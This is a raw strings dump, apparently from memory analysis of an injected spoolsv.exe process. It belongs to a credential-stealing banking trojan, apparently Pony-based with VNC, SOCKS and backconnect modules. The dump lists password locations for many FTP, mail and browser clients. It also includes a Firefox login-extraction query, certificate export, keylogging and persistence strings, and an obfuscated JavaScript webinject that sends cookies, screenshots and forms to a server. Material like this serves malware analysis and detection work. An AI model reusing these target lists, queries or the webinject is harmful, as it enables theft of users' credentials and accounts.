NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
mozsqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
FindCloseUrlCache
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
2)2.2;2~2
7 :(:1:7:
9.979`9}9
8-9G9Z9f9r9}9
%WinDir%\Explorer.EXE
s.dat
iexplore.exe
firefox.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

spoolsv.exe_1444_rwx_00F90000_0004E000:

%Documents and Settings%\All Users\Application Data\wzbrwgd.dat
.text
.rdata
@.data
.reloc
t.Ht Hu%
_^SSSh8
USER32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
GDI32.dll
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l W(i){j.T=i;j.w=s;j.U=1;j.R=l(){p(x M===\'I\'){M=l(){A{k C H("N.F.6.0")}B(e){}A{k C H("N.F.3.0")}B(e){}A{k C H("N.F")}B(e){}A{k C H("17.F")}B(e){}k u}}k C M()};j.o=l(a,b,c,d){J f=j.R();J g=s;J h=j;G=(x(d)==\'I\')?u:q;b=\'/\' j.T \'/\' Z.18() \'/\' b;p(G==q){j.w=s;f.X=l(){A{p(f.Q==4){p(f.O!=P||f.z==\'-\'){h.w=u;p(x(d)=="l"){d(u)}}E{p(f.z==\' \'){h.w=q;p(x(d)=="l"){d(q)}}E{h.w=f.z;p(x(d)=="l"){d(f.z)}}}}}B(e){h.w=u;p(x(d)=="l"){d(u)}}}}f.19(a,b,G);f.1c(c);p(G==q){k q}A{p(f.Q==4&&f.O==P){p(f.z==\'-\'){k u}E{p(f.z==\' \'){k q}E{k f.z}}}k u}B(e){k u}};j.1e=l(){k j.w};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.Y=l(a,b){m=\'2/\' a;k j.o(\'y\',m,s,b)};j.14=l(a,b){m=\'3/\' a;k j.o(\'y\',m,s,b)};j.15=l(a){m=\'4/\';k j.o(\'y\',m,s,a)};j.16=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'y\',\'5/\' t \'/\' a,s,c)};j.1a=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1b=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=s;K=\'y\'}E{c=\'1d: \' c;K=\'v\'}k j.o(K,\'6/\' t \'/\' a,c,d)};j.L=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1f=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1g(a);k j.o(\'y\',m,s,d)};j.1h=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1i=l(a){m=\'10/\';k j.o(\'y\',m,s,a)};j.1j=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1k=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1l=l(a,b,c){m=\'13/\';L=a "\\r\\n" b;k j.o(\'v\',m,L,c)}};',62,84,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||false|POST|_LastAsync|typeof|GET|responseText|try|catch|new||else|XMLHTTP|Async|ActiveXObject|undefined|var|Type|Post|XMLHttpRequest|Msxml2|status|200|readyState|GetXHR||_Key|Version|SetVal|EQFramework|onreadystatechange|GetVal|Math|||||DelVal|ClearVals|GetServer|Microsoft|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm'.split('|'),0,{}));
CertificateAuthority
%s.pfx
cookies.sqlite
\Mozilla\Firefox\Profiles\
cookies.sqlite-journal
\Google\Chrome\User Data\Default\Cookies
chrome/Cookies
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
login=%s&pass=%s
/viewforum.php?f=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=reply&f=%u&t=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=post&f=%u&sid=%0.8X%0.8X%0.8X%0.8X
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
mozsqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
FindCloseUrlCache
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
2)2.2;2~2
7 :(:1:7:
9.979`9}9
8-9G9Z9f9r9}9
.pdata
@.reloc
CRYPT32.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
s.dat
iexplore.exe
firefox.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

spoolsv.exe_1444_rwx_01320000_00078000:

.text
.rdata
@.data
.reloc
t.Ht Hu%
_^SSSh8
{7BD47FDD-1028-4944-A268-024C76A61BA9}
{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{4E153850-602D-4819-B83D-3CCD0A1E7351}
{1DB12055-380D-432E-9763-74AF5EF609C7}
{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}
{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}
{11166F2F-6DE1-4205-8360-3AB2448931C2}
{7B4F16B2-1959-4C21-97FE-6A7768C974CF}
{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}
{77101F80-23B8-43A9-AE7B-5CC95982109D}
\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}
D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{56E926DB-5D71-499E-8BBB-2E28568040CB}
U{4E153850-602D-4819-B83D-3CCD0A1E7351}
2FFC7DAE-2BDA-4ABF-A443-1DD264C72327
USER32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
GDI32.dll
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l W(i){j.T=i;j.w=s;j.U=1;j.R=l(){p(x M===\'I\'){M=l(){A{k C H("N.F.6.0")}B(e){}A{k C H("N.F.3.0")}B(e){}A{k C H("N.F")}B(e){}A{k C H("17.F")}B(e){}k u}}k C M()};j.o=l(a,b,c,d){J f=j.R();J g=s;J h=j;G=(x(d)==\'I\')?u:q;b=\'/\' j.T \'/\' Z.18() \'/\' b;p(G==q){j.w=s;f.X=l(){A{p(f.Q==4){p(f.O!=P||f.z==\'-\'){h.w=u;p(x(d)=="l"){d(u)}}E{p(f.z==\' \'){h.w=q;p(x(d)=="l"){d(q)}}E{h.w=f.z;p(x(d)=="l"){d(f.z)}}}}}B(e){h.w=u;p(x(d)=="l"){d(u)}}}}f.19(a,b,G);f.1c(c);p(G==q){k q}A{p(f.Q==4&&f.O==P){p(f.z==\'-\'){k u}E{p(f.z==\' \'){k q}E{k f.z}}}k u}B(e){k u}};j.1e=l(){k j.w};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.Y=l(a,b){m=\'2/\' a;k j.o(\'y\',m,s,b)};j.14=l(a,b){m=\'3/\' a;k j.o(\'y\',m,s,b)};j.15=l(a){m=\'4/\';k j.o(\'y\',m,s,a)};j.16=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'y\',\'5/\' t \'/\' a,s,c)};j.1a=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1b=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=s;K=\'y\'}E{c=\'1d: \' c;K=\'v\'}k j.o(K,\'6/\' t \'/\' a,c,d)};j.L=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1f=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1g(a);k j.o(\'y\',m,s,d)};j.1h=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1i=l(a){m=\'10/\';k j.o(\'y\',m,s,a)};j.1j=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1k=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1l=l(a,b,c){m=\'13/\';L=a "\\r\\n" b;k j.o(\'v\',m,L,c)}};',62,84,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||false|POST|_LastAsync|typeof|GET|responseText|try|catch|new||else|XMLHTTP|Async|ActiveXObject|undefined|var|Type|Post|XMLHttpRequest|Msxml2|status|200|readyState|GetXHR||_Key|Version|SetVal|EQFramework|onreadystatechange|GetVal|Math|||||DelVal|ClearVals|GetServer|Microsoft|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm'.split('|'),0,{}));
CertificateAuthority
%s.pfx
cookies.sqlite
\Mozilla\Firefox\Profiles\
cookies.sqlite-journal
\Google\Chrome\User Data\Default\Cookies
chrome/Cookies
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
login=%s&pass=%s
/viewforum.php?f=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=reply&f=%u&t=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=post&f=%u&sid=%0.8X%0.8X%0.8X%0.8X
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
